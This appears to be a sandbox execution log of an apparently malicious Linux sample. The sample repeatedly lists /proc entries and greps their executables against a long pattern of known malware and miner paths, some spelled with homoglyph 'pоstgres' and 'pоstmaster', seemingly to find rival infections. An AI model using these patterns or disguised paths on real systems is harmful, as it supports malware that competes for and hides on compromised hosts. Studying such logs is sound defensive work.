/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:792
-
-
/bin/lsls -latrh /proc/192⤵PID:796
-
-
/bin/grepgrep exe2⤵PID:797
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:801
-
-
/bin/lsls -latrh /proc/22⤵PID:803
-
-
/bin/grepgrep exe2⤵PID:804
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:807
-
-
/bin/lsls -latrh /proc/202⤵PID:810
-
-
/bin/grepgrep exe2⤵PID:811
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:814
-
-
/bin/lsls -latrh /proc/2062⤵PID:817
-
-
/bin/grepgrep exe2⤵PID:818
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:821
-
-
/bin/lsls -latrh /proc/212⤵PID:824
-
-
/bin/grepgrep exe2⤵PID:825
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:828
-
-
/bin/lsls -latrh /proc/222⤵PID:831
-
-
/bin/grepgrep exe2⤵PID:832
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:835
-
-
/bin/lsls -latrh /proc/232⤵PID:838
-
-
/bin/grepgrep exe2⤵PID:839
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:841
-
-
/bin/lsls -latrh /proc/242⤵PID:844
-
-
/bin/grepgrep exe2⤵PID:845
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:848
-
-
/bin/lsls -latrh /proc/252⤵PID:851
-
-
/bin/grepgrep exe2⤵PID:852
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:855
-
-
/bin/grepgrep exe2⤵PID:859
-
-
/bin/lsls -latrh /proc/262⤵PID:858
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:864
-
-
/bin/grepgrep exe2⤵PID:869
-
-
/bin/lsls -latrh /proc/2682⤵PID:868
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:874
-
-
/bin/lsls -latrh /proc/2692⤵PID:877
-
-
/bin/grepgrep exe2⤵PID:878
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:881
-
-
/bin/grepgrep exe2⤵PID:885
-
-
/bin/lsls -latrh /proc/272⤵PID:884
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:887
-
-
/bin/grepgrep exe2⤵PID:891
-
-
/bin/lsls -latrh /proc/2712⤵PID:890
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:895
-
-
/bin/lsls -latrh /proc/2722⤵PID:897
-
-
/bin/grepgrep exe2⤵PID:898
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:901
-
-
/bin/lsls -latrh /proc/2732⤵PID:903
-
-
/bin/grepgrep exe2⤵PID:904
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:907
-
-
/bin/lsls -latrh /proc/282⤵PID:909
-
-
/bin/grepgrep exe2⤵PID:910
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:912
-
-
/bin/lsls -latrh /proc/292⤵PID:914
-
-
/bin/grepgrep exe2⤵PID:915
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:917
-
-
/bin/lsls -latrh /proc/2982⤵PID:919
-
-
/bin/grepgrep exe2⤵PID:920
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:922
-
-
/bin/lsls -latrh /proc/32⤵PID:924
-
-
/bin/grepgrep exe2⤵PID:925
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:927
-
-
/bin/lsls -latrh /proc/3012⤵PID:929
-
-
/bin/grepgrep exe2⤵PID:930
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:932
-
-
/bin/lsls -latrh /proc/3122⤵PID:934
-
-
/bin/grepgrep exe2⤵PID:935
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:937
-
-
/bin/lsls -latrh /proc/3382⤵PID:939
-
-
/bin/grepgrep exe2⤵PID:940
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:942
-
-
/bin/lsls -latrh /proc/42⤵PID:944
-
-
/bin/grepgrep exe2⤵PID:945
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:947
-
-
/bin/grepgrep exe2⤵PID:951
-
-
/bin/lsls -latrh /proc/412⤵PID:950
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:954
-
-
/bin/lsls -latrh /proc/422⤵PID:957
-
-
/bin/grepgrep exe2⤵PID:958
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:961
-
-
/bin/lsls -latrh /proc/432⤵PID:964
-
-
/bin/grepgrep exe2⤵PID:965
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:969
-
-
/bin/lsls -latrh /proc/52⤵PID:972
-
-
/bin/grepgrep exe2⤵PID:973
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:975
-
-
/bin/lsls -latrh /proc/5862⤵PID:978
-
-
/bin/grepgrep exe2⤵PID:979
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:982
-
-
/bin/lsls -latrh /proc/5982⤵PID:985
-
-
/bin/grepgrep exe2⤵PID:986
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:989
-
-
/bin/lsls -latrh /proc/62⤵PID:991
-
-
/bin/grepgrep exe2⤵PID:992
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:996
-
-
/bin/lsls -latrh /proc/6012⤵PID:998
-
-
/bin/grepgrep exe2⤵PID:999
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1003
-
-
/bin/grepgrep exe2⤵PID:1006
-
-
/bin/lsls -latrh /proc/6062⤵PID:1005
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1010
-
-
/bin/lsls -latrh /proc/6072⤵PID:1012
-
-
/bin/grepgrep exe2⤵PID:1013
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1016
-
-
/bin/lsls -latrh /proc/6402⤵PID:1019
-
-
/bin/grepgrep exe2⤵PID:1020
-
-
